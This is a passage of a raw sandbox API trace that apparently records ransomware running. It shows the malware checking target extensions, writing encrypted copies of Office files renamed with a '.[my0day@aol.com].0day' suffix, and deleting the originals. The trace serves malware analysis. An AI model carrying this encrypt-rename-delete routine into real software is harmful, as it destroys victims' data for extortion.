Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL") returned 61 [0274.181] lstrlenW (lpString=".zip") returned 4 [0274.181] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0274.181] lstrlenW (lpString=".rar") returned 4 [0274.181] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0274.182] lstrlenW (lpString=".bz2") returned 4 [0274.182] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0274.182] lstrlenW (lpString=".7z") returned 3 [0274.182] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0274.182] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL") returned 61 [0274.182] lstrlenW (lpString=".dbf") returned 4 [0274.182] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0274.182] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL") returned 61 [0274.182] lstrlenW (lpString=".1cd") returned 4 [0274.182] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0274.182] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL") returned 61 [0274.182] lstrlenW (lpString=".jpg") returned 4 [0274.182] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0274.182] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL") returned 61 [0274.182] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL") returned 61 [0274.182] lstrlenW (lpString=".doc") returned 4 [0274.182] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0274.182] lstrlenW (lpString=".docx") returned 5 [0274.182] lstrcmpiW (lpString1=".docx", lpString2="0.DLL") returned -1 [0274.182] lstrlenW (lpString=".pdf") returned 4 [0274.182] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0274.182] lstrlenW (lpString=".xls") returned 4 [0274.182] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0274.182] lstrlenW (lpString=".xlsx") returned 5 [0274.182] lstrcmpiW (lpString1=".xlsx", lpString2="0.DLL") returned -1 [0274.182] lstrlenW (lpString=".ppt") returned 4 [0274.182] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0274.182] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL") returned 61 [0274.182] lstrlenW (lpString=".zip") returned 4 [0274.182] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0274.182] lstrlenW (lpString=".rar") returned 4 [0274.182] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0274.182] lstrlenW (lpString=".bz2") returned 4 [0274.182] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0274.182] lstrlenW (lpString=".7z") returned 3 [0274.182] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0274.182] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL") returned 61 [0274.183] lstrlenW (lpString=".dbf") returned 4 [0274.183] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0274.183] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL") returned 61 [0274.183] lstrlenW (lpString=".1cd") returned 4 [0274.183] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0274.183] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.DLL") returned 61 [0274.183] lstrlenW (lpString=".jpg") returned 4 [0274.183] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0274.183] lstrcmpiW (lpString1=".MMW", lpString2=".0day") returned 1 [0274.183] lstrlenW (lpString="CAGCAT10.MMW") returned 12 [0274.183] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\cagcat10.mmw"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0274.183] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=394200) returned 1 [0274.183] CloseHandle (hObject=0x39c) returned 1 [0274.183] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\cagcat10.mmw")) returned 0x20 [0274.183] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\cagcat10.mmw.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0274.184] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\cagcat10.mmw"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0274.184] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.184] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.184] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\cagcat10.mmw.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0274.231] GetLastError () returned 0x0 [0274.231] ReadFile (in: hFile=0x39c, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x603d8, lpOverlapped=0x0) returned 1 [0274.269] WriteFile (in: hFile=0x300, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0x603e0, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0x603e0, lpOverlapped=0x0) returned 1 [0274.277] ReadFile (in: hFile=0x39c, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x0, lpOverlapped=0x0) returned 1 [0274.277] WriteFile (in: hFile=0x300, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.277] SetEndOfFile (hFile=0x300) returned 1 [0274.584] CloseHandle (hObject=0x300) returned 1 [0274.584] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.584] SetEndOfFile (hFile=0x39c) returned 1 [0274.698] CloseHandle (hObject=0x39c) returned 1 [0274.698] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0274.698] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\cagcat10.mmw")) returned 1 [0274.698] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW") returned 61 [0274.698] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW") returned 61 [0274.698] lstrlenW (lpString=".doc") returned 4 [0274.699] lstrcmpiW (lpString1=".doc", lpString2=".MMW") returned -1 [0274.699] lstrlenW (lpString=".docx") returned 5 [0274.699] lstrcmpiW (lpString1=".docx", lpString2="0.MMW") returned -1 [0274.699] lstrlenW (lpString=".pdf") returned 4 [0274.699] lstrcmpiW (lpString1=".pdf", lpString2=".MMW") returned 1 [0274.699] lstrlenW (lpString=".xls") returned 4 [0274.699] lstrcmpiW (lpString1=".xls", lpString2=".MMW") returned 1 [0274.699] lstrlenW (lpString=".xlsx") returned 5 [0274.699] lstrcmpiW (lpString1=".xlsx", lpString2="0.MMW") returned -1 [0274.699] lstrlenW (lpString=".ppt") returned 4 [0274.699] lstrcmpiW (lpString1=".ppt", lpString2=".MMW") returned 1 [0274.699] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW") returned 61 [0274.699] lstrlenW (lpString=".zip") returned 4 [0274.699] lstrcmpiW (lpString1=".zip", lpString2=".MMW") returned 1 [0274.699] lstrlenW (lpString=".rar") returned 4 [0274.699] lstrcmpiW (lpString1=".rar", lpString2=".MMW") returned 1 [0274.699] lstrlenW (lpString=".bz2") returned 4 [0274.699] lstrcmpiW (lpString1=".bz2", lpString2=".MMW") returned -1 [0274.699] lstrlenW (lpString=".7z") returned 3 [0274.700] lstrcmpiW (lpString1=".7z", lpString2="MMW") returned -1 [0274.700] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW") returned 61 [0274.700] lstrlenW (lpString=".dbf") returned 4 [0274.700] lstrcmpiW (lpString1=".dbf", lpString2=".MMW") returned -1 [0274.700] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW") returned 61 [0274.700] lstrlenW (lpString=".1cd") returned 4 [0274.700] lstrcmpiW (lpString1=".1cd", lpString2=".MMW") returned -1 [0274.700] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW") returned 61 [0274.700] lstrlenW (lpString=".jpg") returned 4 [0274.700] lstrcmpiW (lpString1=".jpg", lpString2=".MMW") returned -1 [0274.700] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW") returned 61 [0274.700] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW") returned 61 [0274.700] lstrlenW (lpString=".doc") returned 4 [0274.700] lstrcmpiW (lpString1=".doc", lpString2=".MMW") returned -1 [0274.700] lstrlenW (lpString=".docx") returned 5 [0274.700] lstrcmpiW (lpString1=".docx", lpString2="0.MMW") returned -1 [0274.700] lstrlenW (lpString=".pdf") returned 4 [0274.700] lstrcmpiW (lpString1=".pdf", lpString2=".MMW") returned 1 [0274.700] lstrlenW (lpString=".xls") returned 4 [0274.700] lstrcmpiW (lpString1=".xls", lpString2=".MMW") returned 1 [0274.700] lstrlenW (lpString=".xlsx") returned 5 [0274.700] lstrcmpiW (lpString1=".xlsx", lpString2="0.MMW") returned -1 [0274.700] lstrlenW (lpString=".ppt") returned 4 [0274.700] lstrcmpiW (lpString1=".ppt", lpString2=".MMW") returned 1 [0274.700] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW") returned 61 [0274.700] lstrlenW (lpString=".zip") returned 4 [0274.700] lstrcmpiW (lpString1=".zip", lpString2=".MMW") returned 1 [0274.700] lstrlenW (lpString=".rar") returned 4 [0274.700] lstrcmpiW (lpString1=".rar", lpString2=".MMW") returned 1 [0274.700] lstrlenW (lpString=".bz2") returned 4 [0274.700] lstrcmpiW (lpString1=".bz2", lpString2=".MMW") returned -1 [0274.700] lstrlenW (lpString=".7z") returned 3 [0274.701] lstrcmpiW (lpString1=".7z", lpString2="MMW") returned -1 [0274.701] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW") returned 61 [0274.701] lstrlenW (lpString=".dbf") returned 4 [0274.701] lstrcmpiW (lpString1=".dbf", lpString2=".MMW") returned -1 [0274.701] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW") returned 61 [0274.701] lstrlenW (lpString=".1cd") returned 4 [0274.701] lstrcmpiW (lpString1=".1cd", lpString2=".MMW") returned -1 [0274.701] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\CAGCAT10.MMW") returned 61 [0274.701] lstrlenW (lpString=".jpg") returned 4 [0274.701] lstrcmpiW (lpString1=".jpg", lpString2=".MMW") returned -1 [0274.701] lstrcmpiW (lpString1=".DLL", lpString2=".0day") returned 1 [0274.701] lstrlenW (lpString="AUTOSHAP.DLL") returned 12 [0274.701] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\autoshap.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0274.794] GetFileSizeEx (in: hFile=0x2cc, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=15776) returned 1 [0274.794] CloseHandle (hObject=0x2cc) returned 1 [0274.795] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\autoshap.dll")) returned 0x20 [0274.838] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\autoshap.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0274.838] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\autoshap.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0274.838] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL") returned 70 [0274.838] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL") returned 70 [0274.838] lstrlenW (lpString=".doc") returned 4 [0274.838] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0274.838] lstrlenW (lpString=".docx") returned 5 [0274.838] lstrcmpiW (lpString1=".docx", lpString2="P.DLL") returned -1 [0274.838] lstrlenW (lpString=".pdf") returned 4 [0274.838] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0274.838] lstrlenW (lpString=".xls") returned 4 [0274.839] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0274.839] lstrlenW (lpString=".xlsx") returned 5 [0274.839] lstrcmpiW (lpString1=".xlsx", lpString2="P.DLL") returned -1 [0274.839] lstrlenW (lpString=".ppt") returned 4 [0274.839] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0274.839] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL") returned 70 [0274.839] lstrlenW (lpString=".zip") returned 4 [0274.839] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0274.839] lstrlenW (lpString=".rar") returned 4 [0274.839] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0274.839] lstrlenW (lpString=".bz2") returned 4 [0274.839] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0274.839] lstrlenW (lpString=".7z") returned 3 [0274.839] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0274.839] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL") returned 70 [0274.839] lstrlenW (lpString=".dbf") returned 4 [0274.839] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0274.839] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL") returned 70 [0274.839] lstrlenW (lpString=".1cd") returned 4 [0274.839] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0274.839] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL") returned 70 [0274.839] lstrlenW (lpString=".jpg") returned 4 [0274.839] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0274.839] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL") returned 70 [0274.839] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL") returned 70 [0274.839] lstrlenW (lpString=".doc") returned 4 [0274.839] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0274.839] lstrlenW (lpString=".docx") returned 5 [0274.840] lstrcmpiW (lpString1=".docx", lpString2="P.DLL") returned -1 [0274.840] lstrlenW (lpString=".pdf") returned 4 [0274.840] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0274.840] lstrlenW (lpString=".xls") returned 4 [0274.840] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0274.840] lstrlenW (lpString=".xlsx") returned 5 [0274.840] lstrcmpiW (lpString1=".xlsx", lpString2="P.DLL") returned -1 [0274.840] lstrlenW (lpString=".ppt") returned 4 [0274.840] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0274.840] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL") returned 70 [0274.840] lstrlenW (lpString=".zip") returned 4 [0274.840] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0274.840] lstrlenW (lpString=".rar") returned 4 [0274.840] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0274.840] lstrlenW (lpString=".bz2") returned 4 [0274.840] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0274.840] lstrlenW (lpString=".7z") returned 3 [0274.840] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0274.840] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL") returned 70 [0274.840] lstrlenW (lpString=".dbf") returned 4 [0274.840] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0274.840] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL") returned 70 [0274.840] lstrlenW (lpString=".1cd") returned 4 [0274.840] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0274.840] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL") returned 70 [0274.840] lstrlenW (lpString=".jpg") returned 4 [0274.840] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0274.840] lstrcmpiW (lpString1=".DLL", lpString2=".0day") returned 1 [0274.840] lstrlenW (lpString="LINES.DLL") returned 9 [0274.841] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\LINES.DLL" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\lines.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0274.873] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=15256) returned 1 [0274.873] CloseHandle (hObject=0x388) returned 1 [0274.873] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\LINES.DLL" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\lines.dll")) returned 0x20 [0274.910] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\LINES.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\lines.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0274.965] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\LINES.DLL" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\lines.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0274.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\LINES.DLL") returned 64 [0274.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\LINES.DLL") returned 64 [0274.965] lstrlenW (lpString=".doc") returned 4 [0274.965] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0274.965] lstrlenW (lpString=".docx") returned 5 [0274.965] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1 [0274.965] lstrlenW (lpString=".pdf") returned 4 [0274.965] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0274.965] lstrlenW (lpString=".xls") returned 4 [0274.965] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0274.965] lstrlenW (lpString=".xlsx") returned 5 [0274.966] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1 [0274.966] lstrlenW (lpString=".ppt") returned 4 [0274.966] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0274.966] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\LINES.DLL") returned 64 [0274.966] lstrlenW (lpString=".zip") returned 4 [0274.966] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0274.966] lstrlenW (lpString=".rar") returned 4 [0274.966] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0274.966] lstrlenW (lpString=".bz2") returned 4 [0274.966] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0274.966] lstrlenW (lpString=".7z") returned 3 [0274.966] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0274.966] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\LINES.DLL") returned 64 [0274.966] lstrlenW (lpString=".dbf") returned 4 [0274.966] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0274.966] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\LINES.DLL") returned 64 [0274.966] lstrlenW (lpString=".1cd") returned 4 [0274.966] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0274.966] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\LINES.DLL") returned 64 [0274.966] lstrlenW (lpString=".jpg") returned 4 [0274.966] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0274.966] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\LINES.DLL") returned 64 [0274.966] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\LINES.DLL") returned 64 [0274.966] lstrlenW (lpString=".doc") returned 4 [0274.966] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0274.966] lstrlenW (lpString=".docx") returned 5 [0274.966] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1 [0274.966] lstrlenW (lpString=".pdf") returned 4 [0274.966] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0274.966] lstrlenW (lpString=".xls") returned 4 [0274.966] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0274.966] lstrlenW (lpString=".xlsx") returned 5 [0274.966] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1 [0274.966] lstrlenW (lpString=".ppt") returned 4 [0274.966] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0274.967] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\LINES.DLL") returned 64 [0274.967] lstrlenW (lpString=".zip") returned 4 [0274.967] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0274.967] lstrlenW (lpString=".rar") returned 4 [0274.967] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0274.967] lstrlenW (lpString=".bz2") returned 4 [0274.967] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0274.967] lstrlenW (lpString=".7z") returned 3 [0274.967] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0274.967] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\LINES.DLL") returned 64 [0274.967] lstrlenW (lpString=".dbf") returned 4 [0274.967] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0274.967] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\LINES.DLL") returned 64 [0274.967] lstrlenW (lpString=".1cd") returned 4 [0274.967] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0274.967] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\LINES.DLL") returned 64 [0274.967] lstrlenW (lpString=".jpg") returned 4 [0274.967] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0274.967] lstrcmpiW (lpString1=".DLL", lpString2=".0day") returned 1 [0274.967] lstrlenW (lpString="ACCOLKI.DLL") returned 11 [0274.967] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCOLKI.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\accolki.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) Thread: id = 65 os_tid = 0x6a4 [0265.356] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10000) returned 0x3560098 [0265.357] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10000) returned 0x35700a0 [0265.357] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x533260 [0265.357] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x6) returned 0x521b70 [0265.357] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x533278 [0265.357] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x100000) returned 0x3f00020 [0265.357] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x5331e8 [0265.357] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x5331e8, Size=0x20) returned 0x587b48 [0265.357] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x5331e8 [0265.357] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x5331e8, Size=0x20) returned 0x587b20 [0265.358] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x74da0000 [0265.358] GetProcAddress (hModule=0x74da0000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x74dcd650 [0265.358] Wow64DisableWow64FsRedirection (in: OldValue=0x3a5ff58 | out: OldValue=0x3a5ff58*=0x0) returned 1 [0265.358] lstrlenW (lpString="kernel32.dll") returned 12 [0265.358] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x587b48 | out: hHeap=0x4a0000) returned 1 [0265.358] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0265.358] HeapFree (in: hHeap=0x4a0000, 